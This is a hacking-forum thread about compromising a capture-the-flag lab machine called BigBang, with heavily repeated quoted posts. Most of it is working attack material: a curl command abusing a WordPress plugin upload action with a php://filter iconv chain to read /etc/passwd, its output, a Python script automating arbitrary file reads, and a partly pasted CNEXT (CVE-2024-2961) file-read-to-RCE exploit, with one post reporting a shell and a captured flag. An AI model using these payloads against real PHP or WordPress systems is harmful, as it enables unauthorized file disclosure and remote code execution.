BigBang a Linux - Hard Machine
by StingEm - Saturday January 25, 2025 at 03:24 PM
#41
(01-26-2025, 03:12 AM)0xbeef Wrote:
(01-26-2025, 03:02 AM)Aditya Wrote:
(01-26-2025, 02:33 AM)0xbeef Wrote:
(01-26-2025, 02:27 AM)testex Wrote: [quote="StingEm" pid='1039732' dateline='1737855210']
This will get you /etc/passwd

curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd'-v

curl: (52) Empty reply from server --------> i got this


Here, it was just a space issue...
curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd' -v

Try this one
 how you are getting /etc/passwd i'm just getting this output * Host blog.bigbang.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.129.203.204
*  Trying 10.129.203.204:80...
* Connected to blog.bigbang.htb (10.129.203.204) port 80
* using HTTP/1.x
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: blog.bigbang.htb
> User-Agent: curl/8.11.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2045
>
* upload completely sent off: 2045 bytes
< HTTP/1.1 200 OK
< Date: Sun, 26 Jan 2025 02:58:40 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 114
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host blog.bigbang.htb left intact
{"status":"OK","response":"http:\/\/blog.bigbang.htb\/wp-content\/uploads\/2025\/01\/1-9.png","attachment_id":164}

follow the link provided -> "blog.bigbang.htb/wp-content/uploads/2025/01/1-9.png?attachment_id=164" , download the image and do some inspections of the image

Im getting it just by doing a curl...

curl http://blog.bigbang.htb/wp-content/uploa...1/1-90.png
GIF89aroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3Confusedys:/dev:/usr/sbin/nologin
sync:x:4:65534Confusedync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologi
Reply
#42
(01-26-2025, 03:14 AM)StingEm Wrote:
(01-26-2025, 03:02 AM)Aditya Wrote:
(01-26-2025, 02:33 AM)0xbeef Wrote:
(01-26-2025, 02:27 AM)testex Wrote: [quote="StingEm" pid='1039732' dateline='1737855210']
This will get you /etc/passwd

curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd'-v

curl: (52) Empty reply from server --------> i got this


Here, it was just a space issue...
curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd' -v

Try this one
 how you are getting /etc/passwd i'm just getting this output * Host blog.bigbang.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.129.203.204
*  Trying 10.129.203.204:80...
* Connected to blog.bigbang.htb (10.129.203.204) port 80
* using HTTP/1.x
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: blog.bigbang.htb
> User-Agent: curl/8.11.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2045
>
* upload completely sent off: 2045 bytes
< HTTP/1.1 200 OK
< Date: Sun, 26 Jan 2025 02:58:40 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 114
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host blog.bigbang.htb left intact
{"status":"OK","response":"http:\/\/blog.bigbang.htb\/wp-content\/uploads\/2025\/01\/1-9.png","attachment_id":164}

??? It says that it completed - in browser goto: http://blog.bigbang.htb/wp-content/uploads/2025/01/ you will see 1-9.png - download and change to txt to read ? or you can use curl - whatever you prefer.

got it
Ban reason: Leeching. (Permanent)
Reply
#43
might be why I cant find htaccess

The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
Require all denied


hosts is not too useful
Reply
#44
(01-26-2025, 03:15 AM)patxasec Wrote:
(01-26-2025, 03:12 AM)0xbeef Wrote:
(01-26-2025, 03:02 AM)Aditya Wrote:
(01-26-2025, 02:33 AM)0xbeef Wrote:
(01-26-2025, 02:27 AM)testex Wrote: [quote="StingEm" pid='1039732' dateline='1737855210']
This will get you /etc/passwd

curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd'-v

curl: (52) Empty reply from server --------> i got this


Here, it was just a space issue...
curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/etc/passwd' -v

Try this one
 how you are getting /etc/passwd i'm just getting this output * Host blog.bigbang.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.129.203.204
*  Trying 10.129.203.204:80...
* Connected to blog.bigbang.htb (10.129.203.204) port 80
* using HTTP/1.x
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: blog.bigbang.htb
> User-Agent: curl/8.11.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2045
>
* upload completely sent off: 2045 bytes
< HTTP/1.1 200 OK
< Date: Sun, 26 Jan 2025 02:58:40 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 114
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host blog.bigbang.htb left intact
{"status":"OK","response":"http:\/\/blog.bigbang.htb\/wp-content\/uploads\/2025\/01\/1-9.png","attachment_id":164}

follow the link provided -> "blog.bigbang.htb/wp-content/uploads/2025/01/1-9.png?attachment_id=164" , download the image and do some inspections of the image

Im getting it just by doing a curl...

curl http://blog.bigbang.htb/wp-content/uploa...1/1-90.png
GIF89aroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3Confusedys:/dev:/usr/sbin/nologin
sync:x:4:65534Confusedync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologi

Well that's the /etc/passwd file you requested lol
Ban reason: Leeching. (Permanent)
Reply
#45
do someone know how to modify the cnext-exploit.py in order to work?
Reply
#46
import requests import sys import time import json if len(sys.argv) != 2:     print("Usage: python LFI.py <file_to_read>")     sys.exit(1) file_to_read = sys.argv[1] url = "http://blog.bigbang.htb/wp-admin/admin-ajax.php" headers = {     "Content-Type": "application/x-www-form-urlencoded", } data = (     "action=upload_image_from_url&id=1&accepted_files=image/gif&url="     f"php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource={file_to_read}" ) try:     response = requests.post(url, headers=headers, data=data)     if response.status_code == 200:         result = response.json()         if result.get("status") == "OK":             file_url = result.get("response")             if file_url.endswith(".png"):                 print(f"PNG URL: {file_url}")                 try:                     file_response = requests.get(file_url)                     if file_response.status_code == 200:                         print("File Contents:")                         print(file_response.text)                     else:                         print(f"Failed to retrieve file. Status code: {file_response.status_code}")                 except Exception as e:                     print(f"An error occurred while fetching the file: {e}")         else:             print("Error: Status is not OK")     else:         print(f"Error: Received status code {response.status_code}") except Exception as e:     print(f"An error occurred: {e}")
you're welcome ladies.
Reply
#47
Anyone got anything ??
Ban reason: Leeching. (Permanent)
Reply
#48
(01-26-2025, 05:19 AM)Aditya Wrote: Anyone got anything ??

still no idea where to go
Reply
#49
(01-26-2025, 06:19 AM)fuckhackthebox Wrote: FINALLY got the ateam leak holy shit

python leak.py http://blog.bigbang.htb/wp-admin/admin-ajax.php id

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/shawking/user.txt
ff1f3b48913b213a31ff6756d2553d38

+rep pls

#!/usr/bin/env python3 # # CNEXT: PHP file-read to RCE (CVE-2024-2961) # Date: 2024-05-27 # Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS) # # TODO Parse LIBC to know if patched # # INFORMATIONS # # To use, implement the Remote class, which tells the exploit how to send the payload. # from __future__ import annotations import base64 import zlib from dataclasses import dataclass from requests.exceptions import ConnectionError, ChunkedEncodingError import os import sys import json as json_ import base64 as base64_ HEAP_SIZE = 2 * 1024 * 1024 BUG = "?".encode("utf-8") payload = "php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=" class Remote:     """A helper class to send the payload and download files.         The logic of the exploit is always the same, but the exploit needs to know how to     download files (/proc/self/maps and libc) and how to send the payload.         The code here serves as an example that attacks a page that looks like:         ```php     <?php         $data = file_get_contents($_POST['file']);     echo "File contents: $data";     ```         Tweak it to fit your target, and start the exploit.     """     def __init__(self, url: str) -> None:         self.url = url         self.session = Session()     def send(self, path: str, final=False) -> Response:         """Sends given `path` to the HTTP server. Returns the response.         """                 data = {             "action" : "upload_image_from_url",             "url" : payload + path,             "id" : "exploit",             "accepted_files" : "image/gif"         }                 response = self.session.post(self.url, data=data)                 response = json_.loads(response.text)["response"]                 if "http://" in response:              response = self.session.get(response)             response = base64_.b64decode(response.content[3:])             return response                         #return self.session.post(self.url, data={"file": path})             def download(self, path: str) -> bytes:         """Returns the contents of a remote file.         """         path = f"php://filter/convert.base64-encode/resource={path}"         response = self.send(path)         return response                 #data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)         #return base64.decode(data) """ @entry @arg("url", "Target URL") @arg("command", "Command to run on the system; limited to 0x140 bytes") @arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.") @arg("heap", "Address of the main zend_mm_heap structure.") @arg(     "pad",     "Number of 0x100 chunks to pad with. If the website makes a lot of heap "     "operations with this size, increase this. Defaults to 20.", ) @dataclass """ class Exploit:     """CNEXT exploit: RCE using a file read primitive in PHP."""     url: str     command: str     sleep: int = 1     heap: str = None     pad: int = 20     def __post_init__(self):         self.remote = Remote(self.url)         self.log = logger("EXPLOIT")         self.info = {}         self.heap = self.heap and int(self.heap, 16)     def __init__(self):         self.check_vulnerable()     def check_vulnerable(self) -> None:         """Checks whether the target is reachable and properly allows for the various         wrappers and filters that the exploit needs.         """                 def safe_download(path: str) -> bytes:             try:                 return self.remote.download(path)             except ConnectionError:                 failure("Target not [b]reachable[/] ?")                     def check_token(text: str, path: str) -> bool:             result = safe_download(path)             return text.encode() == result                 libc = 